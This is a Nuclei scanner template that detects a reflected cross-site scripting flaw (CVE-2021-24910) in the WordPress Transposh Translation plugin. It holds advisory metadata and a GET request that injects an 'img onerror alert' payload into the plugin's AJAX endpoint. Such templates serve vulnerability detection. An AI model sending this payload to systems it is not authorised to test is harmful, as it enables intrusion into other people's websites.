nuclei-templates/http/cves/2021/CVE-2021-24910.yaml

56 lines
2.3 KiB
YAML

id: CVE-2021-24910
info:
name: WordPress Transposh Translation <1.0.8 - Cross-Site Scripting
author: Screamy
severity: medium
description: WordPress Transposh Translation plugin before 1.0.8 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the a parameter via an AJAX action (available to both unauthenticated and authenticated users when the curl library is installed) before outputting it back in the response.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
remediation: |
Update the WordPress Transposh Translation plugin to version 1.0.8 or later to mitigate the vulnerability.
reference:
- https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/
- https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-24910.txt
- https://wpscan.com/vulnerability/b5cbebf4-5749-41a0-8be3-3333853fca17
- https://nvd.nist.gov/vuln/detail/CVE-2021-24910
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-24910
cwe-id: CWE-79
epss-score: 0.00086
epss-percentile: 0.35299
cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: transposh
product: transposh_wordpress_translation
framework: wordpress
tags: cve2021,cve,wordpress,wp-plugin,xss,wp,wpscan,transposh
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q=<img%20src%3dx%20onerror%3dalert(document.domain)>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=x onerror=alert(document.domain)>'
- '{"result":'
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 490a00463044022014bac4faae4bc06cb616eaff74834b1984a9477e95f6b68c2e64a9cb2227639f02204da6b5c0c99fc716fbd168777531fb252d71e50f072c24e332afd9633febf148:922c64590222798bb761d5b6d8e72950